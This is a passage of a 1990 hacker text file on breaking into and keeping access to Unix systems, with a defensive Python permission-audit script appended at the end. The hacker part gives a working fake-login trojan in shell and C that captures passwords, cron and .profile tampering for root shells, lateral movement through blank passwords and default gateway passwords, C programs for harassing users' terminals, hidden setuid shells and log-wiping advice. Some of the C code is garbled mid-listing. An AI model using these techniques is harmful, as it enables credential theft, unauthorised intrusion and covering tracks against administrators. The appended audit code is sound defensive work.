What happens is that you make a copy of the .profile before you change it. Then, you change the original. When he runs it, the steps are made, then the original version is placed over the current, so if the idiot looks in his .profile, he won't see anything out of the ordinary, except that he could notice in a long listing that the change date is very recent, but most users are not paranoid enough to do extensive checks on their files, except sysadm files (such as passwd).

Now, remember, even though you can write to a dir, you may not be able to write to a file without deleting it. If you do not have write perms for that file, you'll have to delete it and write something in its place (put a file with the same name there).
The most important thing to remember if you have to delete a .profile is to CHANGE the OWNER back after you construct a new one (hehe) for that user. He could easily notice that his .profile was changed and he'll know who did it. YES, you can change the owner to someone else besides yourself and the original owner (as to throw him off), but this is not wise as keeping access usually relies on the fact that they don't know you are around.

You can easily change cron files if you can write to them. I'm not going to go into detail about cronfile formats here, just find the crontab files and modify them to create a shell somewhere as root every once in a while, and set the user-id.

III. Trojan Horses on Detached terminals.

Basically this: You can send garbage to a user's screen and mess him up bad enough to force a logoff, creating a detached account. Then you can execute a trojan horse off that terminal in place of login or something, so the next one who calls can hit the trojan horse. This USUALLY takes the form of a fake login and writes the username/pw entered to disk.

Now, there are other trojan horses available for you to write. Now, don't go thinking about a virus, for they don't work unless ROOT runs them. Anyway, a common trojan would be a shell script to get the password, and mail it to you. Now, you can replace the code for the self deleting trojan with one saying something like:

 echo "login: \c"
 read lgin
 echo off (works on some systems)
 (if above not available...: stty -noecho)
 echo "Password:\c"
 read pw
 echo on
 echo "Login: $lgin - Pword: $pw" mail you

Now, the best way to use this is to put it in a separate script file so it can be deleted as part of the self deleting trojan. A quick modification, removing the "login: " and leaving the password may have it look like SU, so you can get the root password. But make sure the program deletes itself. Here is a sample trojan login in C:

 #include /* Get the necessary defs.. */
 main()
 {
   char *name[80];
   char *pw[20];
   FILE *strm;
   printf("login: ");
   gets(name);
   pw = getpass("Password:");
   strm = fopen("/WhereEver/Whateverfile","a");
   fprintf(strm,"User: (%s), PW [%s]\n",name,pw);
   fclose(strm);
   /* put some kind of error below... or something... */
   printf("Bus Error - Core Dumped\n");
   exit(1);
 }

The program gets the login, and the password, and appends it to a file (/wherever/whateverfile), and creates the file if it can, and if its not there. That is just an example. Network Annoyances come later.

IV. Odd systems

There may be systems you can log in to with no problem, and find some slack menu, database, or word processor as your shell, with no way to the command interpreter (sh, ksh, etc..). Don't give up here. Some systems will let you login as root, but give you a menu which will allow you to add an account. However, ones that do this usually have some purchased software package running, and the people who made the software KNOW that the people who bought it are idiots, and the thing will sometimes only allow you to add accounts with user-id 100 or greater, with their special menushell as a shell. You probably won't get to pick the shell, the program will probably stick one on the user you created which is very limiting. HOWEVER, sometimes you can edit accounts, and it will list accounts you can edit on the screen. HOWEVER, these programs usually only list those with UIDS > 100 so you don't edit the good accounts, however, they do not stop you from editing an account with a UID < uid="100(sirhack)" gid="100(users)">: /etc/passwd (you see: )

 root:dkdjkgsf!!!:0:0:Sysop:/:/bin/sh
 sirhack:dld!k%%^%:100:100:Sir Hackalot:/usr/usr1/sirhack:/bin/sh
 datawiz::101:100:The Data Wizard:/usr/usr1/datawiz:/bin/sh
 ...

Now I have found an account to take over! "datawiz" will get me in with no trouble, then I can change his password, which he will not like at all. Some systems leave "sysadm" unpassworded (stupid!), and now, Most versions of Unix, be it Xenix, Unix, BSD, or whatnot, they ship a sysadm shell which will menu drive all the important shit, even creating users, but you must have ansi or something.

You can usually tell when you'll get a menu. Sometimes on UNIX SYSTEM V, when it says TERM = (termtype), and is waiting for you to press return or whatever, you will probably get a menu.. ack.

V. Shadowed Password files

Not much to say about this. all it is, is when every password field in the password file has an "x" or just a single character. What that does is screw you, because you cannot read the shadowed password file, only root can, and it contains all the passwords, so you will not know what accounts have no passwords, etc.

There are a lot of other schemes for hacking unix, lots of others, from writing assembly code that modifies the PCB through self-changing code which the interrupt handler doesn't catch, and things like that. However, I do not want to give away everything, and this was not meant for advanced Unix Hackers, or at least not the ones that are familiar with 68xxx, 80386 Unix assembly language or anything. Now I will Talk about Internet.

--->>> InterNet <<<---

Why do I want to talk about InterNet? Well, because it is a prime example of a TCP/IP network, better known as a WAN (Wide-Area-Network). Now, mainly you will find BSD systems off of the Internet, or SunOS, for they are the most common. They may not be when System V, Rel 4.0, Version 2.0 comes out. Anyway, these BSDs/SunOSs like to make it easy to jump from one computer to another once you are logged in. What happens is EACH system has a "yellow page password file". Better known as yppasswd. If you look in there, and see blank passwords you can use rsh, rlogin, etc.. to slip into that system.
One system in particular I came across had a yppasswd file where *300* users had blank passwords in the Yellow Pages. Once I got in on the "test" account, ALL I had to do was select who I wanted to be, and do: rlogin -l user (sometimes -n). Then it would log me onto the system I was already on, through TCP/IP. However, when you do this, remember that the yppasswd only pertains to the system you are on at the time. To find accounts, you could find the yppasswd file and do:

 % cat yppasswd grep ::

Or, if you can't find yppasswd..

 % ypcat passwd grep ::

On ONE system (which will remain confidential), I found the DAEMON account left open in the yppasswd file. Not bad. Anyway, through one system on the internet, you can reach many. Just use rsh, or rlogin, and look in the file: /etc/hosts for valid sites which you can reach. If you get on to a system, and rlogin to somewhere else, and it asks for a password, that just means one of two things:

A. Your account that you have hacked on the one computer is on the target computer as well. Try to use the same password (if any) you found the hacked account to have. If it is a default, then it is definitely on the other system, but good luck...

B. rlogin/rsh passed your current username along to the remote system, so it was like typing in your login at a "login: " prompt. You may not exist on the other machine. Try "rlogin -l login_name", or rlogin -n name.. sometimes, you can execute "rwho" on another machine, and get a valid account.

Some notes on Internet servers. There are "GATEWAYS" that you can get into that will allow access to MANY internet sites. They are mostly run off a modified GL/1 or GS/1. No big deal. They have help files. However, you can get a "privileged" access on them, which will give you CONTROL of the gateway.. You can shut it down, remove systems from the Internet, etc.. When you request to become privileged, it will ask for a password. There is a default. The default is "system".
I have come across *5* gateways with the default password. Then again, DECNET has the same password, and I have come across 100+ of those with the default privileged password. CERT Sucks. A Gateway that led to APPLE.COM had the default password. Anyone could have removed apple.com from the internet. Be advised that there are many networks now that use TCP/IP.. Such as BARRNET, LANET, and many other University networks.

--** Having Fun **--

Now, if nothing else, you should at least have some fun. No, I do not mean go trashing hardrives, or unlinking directories to take up inodes, I mean play with online users. There are many things to do. Re-direct output to them is the biggie. Here is an example:

 $ who
 loozer tty1
 sirhack tty2
 $ banner You Suck >/dev/tty1
 $

That sent the output to loozer. The TTY1 is where I/O is being performed to his terminal (usually a modem if it is a TTY). You can repetitiously banner him with a do while statement in shell, causing him to logoff. Or you can get sly, and just screw with him. Observe this C program:

 #include
 #include
 #include
 main(argc,argument)
 int argc;
 char *argument[];
 {
   int handle;
   char *pstr,*olm[80];
   char *devstr = "/dev/";
   int acnt = 2;
   FILE *strm;
   pstr = "";
   if (argc == 1) {
     printf("OL (OneLiner) Version 1.00 \n");
     printf("By Sir Hackalot [PHAZE]\n");
     printf("\nSyntax: ol tty message\n");
     printf("Example: ol tty01 You suck\n");
     exit(1);
   }
   printf("OL (OneLiner) Version 1.0\n");
   printf("By Sir Hackalot [PHAZE]\n");
   if (argc == 2) {
     strcpy(olm,"");
     printf("\nDummy! You forgot to Supply a ONE LINE MESSAGE\n");
     printf("Enter one Here => ");
     gets(olm);
   }
   strcpy(pstr,"");
   strcat(pstr,devstr);
   strcat(pstr,argument[1]);
   printf("Sending to: [%s]\n",pstr);
   strm = fopen(pstr,"a");
   if (strm == NULL) {
     printf("Error writing to: %s\n",pstr);
     printf("Cause: No Write Perms?\n");
     exit(2);
   }
   if (argc == 2) {
     if (strcmp(logname(),"sirhack") != 0) fprintf(strm,"Message from (%s): \n",logname());
     fprintf(strm,"%s\n",olm);
     fclose(strm);
     printf("Message Sent.\n");
     exit(0);
   }
   if (argc > 2) {
     if (strcmp(logname(),"sirhack") != 0) fprintf(strm,"Message from (%s):\n",logname());
     while (acnt <= argc - 1) {
       fprintf(strm,"%s ",argument[acnt]);
       acnt++;
     }
     fclose(strm);
     printf("Message sent!\n");
     exit(0);
   }
 }

What the above does is send one line of text to a device writeable by you in /dev. If you try it on a user named "sirhack" it will notify sirhack of what you are doing. You can supply an argument at the command line, or leave a blank message, then it will prompt for one. You MUST supply a Terminal. Also, if you want to use ?, or *, or (), or [], you must not supply a message at the command line, wait till it prompts you. Example:

 $ ol tty1 You Suck!
 OL (OneLiner) Version 1.00
 by Sir Hackalot [PHAZE]
 Sending to: [/dev/tty1]
 Message Sent!
 $

Or..

 $ ol tty1
 OL (OneLiner) Version 1.00
 by Sir Hackalot [PHAZE]
 Dummy! You Forgot to Supply a ONE LINE MESSAGE!
 Enter one here => Loozer! Logoff (NOW)!! ^G^G
 Sending to: [/dev/tty1]
 Message Sent!
 $

You can even use it to fake messages from root.
Here is another:

 /*
  * Hose another user
  */
 #include
 #include
 #include
 #include
 #include
 #include
 #include
 #include
 #define NMAX sizeof(ubuf.ut_name)
 struct utmp ubuf;
 struct termio oldmode, mode;
 struct utsname name;
 int yn; int loop = 0;
 char *realme[50] = "Unknown";
 char *strcat(), *strcpy(), me[50] = "???", *him, *mytty, histty[32];
 char *histtya, *ttyname(), *strrchr(), *getenv();
 int signum[] = {SIGHUP, SIGINT, SIGQUIT, 0}, logcnt, eof(), timout();
 FILE *tf;
 main(argc, argv)
 int argc;
 char *argv[];
 {
   register FILE *uf;
   char c1, lastc;
   int goodtty = 0;
   long clock = time((long *) 0);
   struct tm *localtime();
   struct tm *localclock = localtime( &clock );
   struct stat stbuf;
   char psbuf[20], buf[80], window[20], junk[20];
   FILE *pfp, *popen();
   if (argc < him =" argv[1];"> 2) histtya = argv[2];
   if ((uf = fopen("/etc/utmp", "r")) == NULL) {
     printf("cannot open /etc/utmp\n");
     exit(1);
   }
   cuserid(me);
   if (me == NULL) {
     printf("Can't find your login name\n");
     exit(1);
   }
   mytty = ttyname(2);
   if (mytty == NULL) {
     printf("Can't find your tty\n");
     exit(1);
   }
   if (stat(mytty, &stbuf) < histtya =" strrchr(histtya," logcnt="="0)" histtya="="0"> 1) {
     printf("%s logged more than once\nwriting to %s\n", him, histty+5);
   }
   if (access(histty, 0) < tf =" fopen(histty," yn =" 1;" yn ="="" lastc =" '\n';printf(" loop ="="" c1 =" '\b';" i =" fork();" i ="="" i="0;">

 #include
 main(argc,argv)
 char *argv[];
 int argc;
 {
   int x = 1;
   char *device = "/dev/";
   FILE *histty;
   if (argc == 1) {
     printf("Bafoon. Supply a TTY.\n");
     exit(1);
   }
   strcat(device,argv[1]);
   /* Make the filename /dev/tty.. */
   histty = fopen(device,"a");
   if (histty == NULL) {
     printf("Error opening/writing to tty. Check their perms.\n");
     exit(1);
   }
   printf("BSV - Backspace virus, By Sir Hackalot.\n");
   printf("The Sucker on %s is getting it!\n",device);
   while (x == 1) {
     fprintf(histty,"\b\b");
     fflush(histty);
     sleep(5);
   }
 }

Thats all there is to it. If you can write to their tty, you can use this on them. It sends two backspaces to them every approx. 5 seconds.
You should run this program in the background. (&). Here is an example:

 $ who
 sirhack tty11
 loozer tty12
 $ bsv tty12&
 [1] 4566
 BSV - Backspace virus, by Sir Hackalot
 The Sucker on /dev/tty12 is getting it!
 $

Now, it will keep "attacking" him, until he logs off, or you kill the process (which was 4566 -- when you use &, it gives the pid [usually]).

** Note *** Keep in mind that MSDOS, and other OP systems use The CR/LF method to terminate a line. However, the LF terminates a line in Unix. You must STRIP CR's on an ascii upload if you want something you upload to an editor to work right. Else, you'll see a ^M at the end of every line. I know that sucks, but you just have to compensate for it.

I have a number of other programs that annoy users, but that is enough to get your imagination going, provided you are a C programmer. You can annoy users other ways. One thing you can do is screw up the user's mailbox. The way to do this is to find a binary file (30k or bigger) on the system which YOU have access to read. Then, do this:

 $ cat binary_file mail loozer
 or
 $ mail loozer <>/dev/tty12
 $

It may pause for a while while it outputs it. If you want to resume what you were doing instantly, do:

 $ cat binary_file >/dev/tty12&
 [1] 4690
 $

And he will probably logoff. You can send the output of anything to his terminal. Even what YOU do in shell. Like this:

 $ sh >/dev/tty12
 $

You'll get your prompts, but you won't see the output of any commands, he will...

 $ ls
 $ banner Idiot!
 $ echo Dumbass!
 $

until you type in exit, or hit ctrl-d.

There are many many things you can do. You can fake a "write" to someone and make them think it was from somewhere on the other side of hell. Be creative.

When you are looking for things to do, look for holes, or try to get someone to run a trojan horse that makes a suid shell. If you get someone to run a trojan that does that, you can run the suid, and log their ass off by killing their mother PID. (kill -9 whatever). Or, you can lock them out by adding "kill -1 0" to their .profile.
On the subject of holes, always look for BAD suid bits. On one system thought to be invincible I was able to read/modify everyone's mail, because I used a mailer that had both the GroupID set, and the UserID set. When I went to shell from it, the program instantly changed my Effective ID back to me, so I would not be able to do anything but my regular stuff. But it was not designed to change the GROUP ID back. The sysop had blundered there. SO when I did an ID I found my group to be "Mail". Mailfiles are readable/writeable by the user "mail", and the group "mail". I then set up a sgid (set group id) shell to change my group id to "mail" when I ran it, and scanned important mail, and it got me some good info. So, be on the look out for poor permissions.

Also, after you gain access, you may want to keep it. Some tips on doing so:

 1. Don't give it out. If the sysadm sees that joeuser logged in 500 times in one night....then....
 2. Don't stay on for hours at a time. They can trace you then. Also they will know it is irregular to have joeuser on for 4 hours after work.
 3. Don't trash the system. Don't erase important files, and don't hog inodes, or anything like that. Use the machine for a specific purpose (to leech source code, develop programs, an Email site). Dont be an asshole, and don't try to erase everything you can.
 4. Don't screw with users constantly. Watch their processes and run what they run. It may get you good info (snoop!)
 5. If you add an account, first look at the accounts already in there. If you see a bunch of accounts that are just 3 letter abbrv.'s, then make yours so. If a bunch are "cln, dok, wed" or something, don't add one that is "joeuser", add one that is someone's full initials.
 6. When you add an account, put a woman's name in for the description, if it fits (Meaning, if only companies log on to the unix, put a company name there). People do not suspect hackers to use women's names. They look for men's names.
 7. Don't cost the Unix machine too much money. Ie.. don't abuse an outdial, or if it controls trunks, do not set up a bunch of dial outs. If there is a pad, don't use it unless you NEED it.
 8. Don't use x.25 pads. Their usage is heavily logged.
 9. Turn off acct logging (acct off) if you have the access to. Turn it on when you are done.
 10. Remove any trojan horses you set up to give you access when you get access.
 11. Do NOT change the MOTD file to say "I hacked this system". Just thought I'd tell you. Many MANY people do that, and lose access within 2 hours, if the unix is worth a spit.
 12. Use good judgement. Cover your tracks. If you use su, clean up the sulog.
 13. If you use cu, clean up the cu_log.
 14. If you use the smtp bug (wizard/debug), set up a uid shell.
 15. Hide all suid shells. Here's how: goto /usr (or any dir) do:

      # mkdir ".. "
      # cd ".. "
      # cp /bin/sh ".whatever"
      # chmod a+s ".whatever"

     The "" are NEEDED to get to the directory .. ! It will not show up in a listing, and it is hard as hell to get to by sysadms if you make 4 or 5 spaces in there (".. "), because all they will see in a directory FULL list will be .. and they won't be able to get there unless they use "" and know the spacing. "" is used when you want to do literals, or use a wildcard as part of a file name.
 16. Don't hog cpu time with password hackers. They really don't work well.
 17. Don't use too much disk space. If you archive something to dl, dl it, then kill the archive.
 18. Basically -- COVER YOUR TRACKS.

Some final notes:

Now, I hear lots of rumors and stories like "It is getting harder to get into systems...". Wrong. (Yo Pheds! You reading this??). It IS true when you are dealing with WAN's, such as telenet, tymnet, and the Internet, but not with local computers not on those networks. Here's the story:

Over the past few years, many small companies have sprung up as VARs (Value Added Resellers) for Unix and Hardware, in order to make a fast buck.
Now, these companies fast talk companies into buying whatever, and they proceed in setting up the Unix. Now, since they get paid by the hour usually when setting one up, they spread it out over days.... during these days, the system is WIDE open (if it has a dialin). Get in and add yourself to passwd before they seal it off (if they do..). Then again, after the machine is set up, they leave the defaults on the system. Why? The company needs to get in, and most VARs cannot use unix worth a shit, all they know how to do is set it up, and that is ALL. Then, they turn over the system to a company or business that USUALLY has no-one that knows what the hell they are doing with the thing, except with menus. So, they leave the system open to all...(inadvertently..), because they are not competent. So, you could usually get on, and create havoc, and at first they will think it is a bug.. I have seen this happen ALL too many times, and it is always the same story...

The VAR is out for a fast buck, so they set up the software (all they know how to do), and install any software packages ordered with it (following the step by step instructions). Then they turn it over to the business who runs a word processor, or database, or something, unaware that a "shell" or command line exists, and they probably don't even know root does. So, we will see more and more of these pop up, especially since AT&T is now bundling a version of Xwindows with their new System V, and Simultask... which will lead to even more holes. You'll find systems local to you that are easy as hell to get into, and you'll see what I mean. These VARs are really actually working for us. If a security problem arises that the business is aware of, they call the VAR to fix it... Of course, the Var gets paid by the hour, and leaves something open so you'll get in again, and they make more moolahhhh.

You can use this phile for whatever you want. I can't stop you. Just to learn unix (heh) or whatever.
But its YOUR ass if you get caught. Always consider the penalties before you attempt something. Sometimes it is not worth it, Sometimes it is.

This phile was not meant to be comprehensive, even though it may seem like it. I have left out a LOT of techniques, and quirks, specifically to get you to learn SOMETHING on your own, and also to retain information so I will have some secrets. You may pass this file on, UNMODIFIED, to any GOOD H/P BBS. Sysops can add things to the archive to say where it was DL'd from, or to the text viewer for the same purpose. This is Copywrited (haha) by Sir Hackalot, and by PHAZE, in the year 1990.
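Added example (not part of the original file, and not the author's code): a defender-side audit in Python for the weaknesses the text above depends on, namely set-id files outside system directories or writable by others, login startup files writable by group/other, entries with padded names such as ".. ", and empty password fields in an unshadowed passwd file. The startup-file list, the trusted directory list and the sample passwd text are assumptions constructed for the example.

```python
import os
import stat

# Constructed sample in the classic unshadowed /etc/passwd layout,
# using the three entries from the listing shown earlier in the text.
SAMPLE_PASSWD = """\
root:dkdjkgsf!!!:0:0:Sysop:/:/bin/sh
sirhack:dld!k%%^%:100:100:Sir Hackalot:/usr/usr1/sirhack:/bin/sh
datawiz::101:100:The Data Wizard:/usr/usr1/datawiz:/bin/sh
"""

# Assumed policy values; adjust both to the system being audited.
STARTUP_FILES = {".profile", ".login", ".cshrc", ".bashrc", ".bash_profile"}
TRUSTED_SETID_DIRS = ("/bin", "/sbin", "/usr/bin", "/usr/sbin")
LOOSE_WRITE = stat.S_IWGRP | stat.S_IWOTH


def passwd_findings(text):
    """Flag empty password fields and UID 0 accounts other than root."""
    findings = []
    for line in text.splitlines():
        fields = line.split(":")
        if line.startswith("#") or len(fields) < 7:
            continue
        user, password, uid = fields[0], fields[1], fields[2]
        if password == "":
            findings.append((user, "empty password field"))
        if uid == "0" and user != "root":
            findings.append((user, "UID 0 account other than root"))
    return findings


def mode_findings(name, mode, trusted_setid=False):
    """Classify one directory entry from its name and lstat() mode."""
    issues = []
    if stat.S_ISREG(mode):
        if mode & (stat.S_ISUID | stat.S_ISGID):
            if mode & LOOSE_WRITE:
                # Anyone who can write the file can replace what runs set-id.
                issues.append("set-id file writable by group/other")
            elif not trusted_setid:
                issues.append("set-id file outside trusted directories")
        if name in STARTUP_FILES and mode & LOOSE_WRITE:
            issues.append("startup file writable by group/other")
    if stat.S_ISDIR(mode) and mode & stat.S_IWOTH and not mode & stat.S_ISVTX:
        issues.append("world-writable directory without sticky bit")
    if name != name.strip() or (len(name) > 2 and name.strip(".") == ""):
        issues.append("name padded with whitespace or made only of dots")
    return issues


def audit_tree(root, trusted_dirs=TRUSTED_SETID_DIRS):
    """Walk root and return sorted (path, issue) pairs."""
    results = []
    for dirpath, dirnames, filenames in os.walk(root):
        trusted = any(dirpath == d or dirpath.startswith(d + "/")
                      for d in trusted_dirs)
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            try:
                mode = os.lstat(path).st_mode  # lstat: do not follow symlinks
            except OSError:
                continue  # entry vanished or is unreadable
            results.extend((path, issue)
                           for issue in mode_findings(name, mode, trusted))
    return sorted(results)


if __name__ == "__main__":
    for user, issue in passwd_findings(SAMPLE_PASSWD):
        print(f"passwd: {user}: {issue}")
    for path, issue in audit_tree(os.path.expanduser("~")):
        print(f"{path}: {issue}")
```

Comparing each run against a saved baseline of expected set-id files turns the "outside trusted directories" finding into a change detector.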